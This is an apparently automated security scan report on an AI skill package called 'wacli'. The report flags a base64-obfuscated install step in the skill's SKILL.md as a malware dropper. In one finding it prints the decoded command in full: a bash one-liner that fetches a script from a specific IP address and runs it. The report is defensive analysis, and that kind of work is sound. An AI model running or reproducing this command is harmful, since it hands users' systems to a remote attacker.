Trust Assessment
wacli received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 4 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Command Injection via Obfuscated Shell Script, Hidden Instructions via Base64 Encoding.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 10/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/wacli-5qi/SKILL.md:10 | |
| CRITICAL | Command Injection via Obfuscated Shell Script The skill package instructs users to execute a base64-encoded shell command that, when decoded, downloads and runs an arbitrary script from an unverified IP address (91.92.242.30). This constitutes a severe command injection vulnerability, allowing for arbitrary code execution on the user's system. The decoded command is: `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This is a classic dropper pattern. Remove the malicious installation instruction. Users should never be instructed to execute obfuscated commands that download and run scripts from untrusted sources. Provide a secure, verifiable installation method for 'OpenClawProvider' or remove the dependency if it cannot be sourced safely. | LLM | SKILL.md:15 | |
| CRITICAL | Hidden Instructions via Base64 Encoding The skill package uses base64 encoding to obfuscate a shell command. This technique is commonly used to hide malicious payloads and bypass security checks. The hidden instruction, when decoded, reveals a command to download and execute a script from an external server, which is a direct command injection. Remove the obfuscated installation instruction. All commands should be clear, transparent, and sourced from trusted repositories. If 'OpenClawProvider' is a legitimate dependency, provide a direct, non-obfuscated, and verifiable installation method. | LLM | SKILL.md:15 | |
| CRITICAL | Supply Chain Risk: Untrusted Script Execution The skill package instructs users to download and execute a script from an unverified IP address (91.92.242.30) as part of the 'OpenClawProvider' installation. This introduces a critical supply chain risk, as the content of the script is unknown and could contain malware, backdoors, or other malicious code. This bypasses standard package management security measures and directly compromises the user's system. Remove the instruction to download and execute scripts from untrusted sources. All dependencies should be installed via official package managers or from well-known, trusted repositories with proper integrity checks. Ensure 'OpenClawProvider' is available through a secure distribution channel. | LLM | SKILL.md:15 |
Scan History
Embed Code
[](https://skillshield.io/report/1fe973add6364424)
Powered by SkillShield